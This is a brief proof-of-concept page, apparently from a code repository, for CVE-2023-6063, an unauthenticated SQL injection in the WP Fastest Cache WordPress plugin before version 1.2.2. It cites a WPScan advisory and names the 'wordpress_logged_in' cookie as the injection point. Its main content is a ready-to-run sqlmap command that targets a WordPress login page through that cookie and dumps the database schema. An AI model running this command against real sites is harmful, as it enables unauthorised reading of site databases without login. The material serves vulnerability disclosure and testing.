CVE-2023-6063 (WP Fastest Cache < 1.2.2 - UnAuth SQL Injection)# CVE-2023-6063 PoC
## Reference
- [Unauthenticated SQL Injection Vulnerability Addressed in WP Fastest Cache 1.2.2 | WPScan](https://wpscan.com/blog/unauthenticated-sql-injection-vulnerability-addressed-in-wp-fastest-cache-1-2-2/)
## Plugin setting
Enable "WP Fastest Cache".

## PoC
The "wordpress_logged_in" cookie parameter is vulnerable.
```
$ python sqlmap.py --dbms=mysql -u "http://127.0.0.1/wp-login.php" --cookie='wordpress_logged_in=*' --level=2 --schema
```

Log in to view the POC file snapshot cached by Shenlong Bot
Log in to view